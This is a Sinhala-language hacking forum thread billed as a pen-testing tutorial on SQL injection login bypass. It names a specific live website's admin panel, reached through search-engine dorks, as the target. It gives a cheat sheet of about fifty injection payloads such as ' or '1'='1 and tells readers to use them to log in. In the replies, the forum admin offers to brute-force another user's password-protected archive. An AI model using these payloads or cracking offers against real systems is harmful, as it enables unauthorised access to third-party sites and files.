ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here




[Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass
#1
Star 
Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass

හායි හැමෝටම, දවසින් දෙකෙන් දෙන්නම් කියලා හිතාගෙන හිටපු එක දෙන්නම සෑහෙන කාලයක් ගියා. වැඩ ගොඩකට අහුවුන නිසා බිසී වෙලා හිටියෙ. අදත් අරගෙන ආවෙ තවත් Pentesting Tut එකක්. කලින් දවසෙදිත් අපි Vul එකක් හොයලා SQL වලින් Inject කලා. මතක ඇතිනෙ අද කියලා දෙන්න යන්නෙ Bypass එකක් කරගන්න විදිහ. Big Grin Big Grin

හරි ඉතින් අපි අදත් බලමු මොනවද කරන්න පුළුවන් කියලා. අපි අද කරන්න යන්නෙ පුංචි ගේමක් දෙන්න. මේවා නිසා තමයි ලොකු ලොකු හැකර්ස්ලා බිහි වෙලා ඉන්නෙත්. ඒ නිසා මුල ඉදන්ම ඉගෙනගන්න එක වටිනවනෙ. Sad

අදත් අපිට සයිට් එකක් හොයාගන්න වෙනවා. මම උදාහරනෙට ගන්නෙ අපි කලින් දවසෙ ගත්ත සයිට් එකමයි. haha

[Only registered and activated users can see links Click here to register]

දැන් ඉතින් මම හිතනවා මේ සීරීස් එකත් එක්ක ඉන්න හැමෝටම Dork එකක් හදාගන්න විදිහ ගැන අමුතුවෙන් කියලා දෙන්න ඕනෙ නෑ.

දන් නැති කෙනෙක් ඉන්නවා නම් මේ පෝස්ට් 2 බලන්න.

[Only registered and activated users can see links Click here to register]
[Only registered and activated users can see links Click here to register]

කලින් ටියුට් ටික ඕනෙනම් මෙතනින් බලන්න.

[Only registered and activated users can see links Click here to register]
[Only registered and activated users can see links Click here to register]

හරි එහෙනම් අපි මේ සයිට් එකේ Admin Panel එක හොයාගමු පොඩි Search එකකින්. මම Dork එක හදාගන්නවා මේ විදිහට. Smile

[Only registered and activated users can see links Click here to register]

මම කලිනුත් කිව්වා මේවට Bing Use කරනවා නම් හොදයි කියලා. මොකද ඒකෙ හොද Crawler එකක් තියනවා. මේක නම් Google Search කලත් එනවා. ඒ නිසා අවුලක් නෑ. මට නම් එක සර්ච් රිසාල්ට් එකයි ආවෙ. Big Grin Big Grin

ඒකෙ URL එක තියෙන්නෙ මේ විදිහට.

Admin Panel | World Tradexpert
worldtradexperts.com/admin/

අපි ගිහින්ම බලමු ඒකට.

මේකෙ Input field දෙකක් සහ Submit Button එකක් පේන්න තියනවා. Angel

අපිට දැන් එකින් එකට බලන්න වෙනවා Username සහ Password වලට මොනවද දෙන්නෙ කියලා.

ඒත් එහෙම කලේ ඉස්සර. අපි මේක Bypass කරන්න බලමු.

සාමාන්‍යයෙන් මේවගෙ Username එකට use කරන්නෙ Admin කියලමයි. Tongue

එතකොට දාන Password එක......!

ඒකට CheatSheet එකක්ම තියනවා. Huh


Code:
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or '1'='1
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055


මම මෙතනදි ගන්නම් ' or '1'='1 මේක. උඩු කමා අරවා මේවා හරියට තියෙන්න ඕනෙ ඈ. love

හරි නිකමට වගේ Username එකට Admin දාලා Password එකට ' or '1'='1 දාලා Login වෙන්න බලන්න. මොකද උනේ වැඩේ ගොඩ නේද? හරියට දැම්මා නම් Log වෙන්න පුළුවන් වෙන්න ඕනෙ. Confused

හැබැයි ඉතිං මතක තියාගන්න ඕනෙ. මේවා හැම එකටම හරියන් නෑ. WP, MyBB, Vanilla, Xenforo වගේ CMS ගොඩකට දැන් මේක වැඩ නෑ. වැඩ කරන ඒවත් තියනවා. හරි ඒනම් මම යනවා. Dodgy

පුළුවන් විදිහට Training වෙන්න. අනිත් ටියුට් ටිකත් ඉක්මනටම දෙන්නම්. Shy Shy

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries: [email protected] 
#2
Star 
Ftta ayyeh
Elama
Tongue
Reply
#3
හායි ......................
Reply
#4
එලම,බන්ග්??
Reply
#5
Supiriya bn
Reply
#6
7 zip password dapu ekak crack karaganna widiyak kiyanna puluwnda.
Reply
#7
(03-05-2019, 09:56 AM)Samee Wrote: 7 zip password dapu ekak crack karaganna widiyak kiyanna puluwnda.

Brute Force Attarcker 1ක් තිබුනා. සයිස් 1 පොඩි 1ක් නම් මෙතනට දාන්න. අපි කඩලා දෙන්නම් පාස් එක

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries: [email protected] 
Reply
#8
20mb file ekak. Kohomada file ekak add krnne methanata. Thanks.
Menna meka drive link eka. indicator ekak forex.
[Only registered and activated users can see links Click here to register]
Reply
#9
iFrame injection
Damn.. There's a little bit of devil in her angel eyelove love

1
Reply
#10
(03-06-2019, 02:42 AM)Mmx Wrote: iFrame injection

ඉස්සරහට දෙනවා මචං. දැන්ම දුන්නම ඇඩ්වාන්ස් වැඩි වෙයිද දන් නෑ.

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries: [email protected] 
1
1
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
Star [Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass - Video Tutorial Elite_x 1 131 05-07-2019, 05:18 AM
Last Post: Mmx
Star [Tut] Pen-testing tutorial - 002 [තේරෙන සිංහලෙන්] | SQL injection Elite_x 19 1,513 03-26-2019, 10:58 AM
Last Post: holmantora
  [Tut] Sql injection - login bypassing ph03n1x 8 1,035 03-07-2019, 03:24 AM
Last Post: Bumindu sandeepa
  [Tut] Sql injection - login bypassing - part 2 ph03n1x 9 1,300 03-06-2019, 02:40 AM
Last Post: ph03n1x
Star [Tut] Pen-testing tutorial - 001 [තේරෙන සිංහලෙන්] Elite_x 14 2,103 01-29-2019, 01:02 PM
Last Post: OWL99



Users browsing this thread: 1 Guest(s)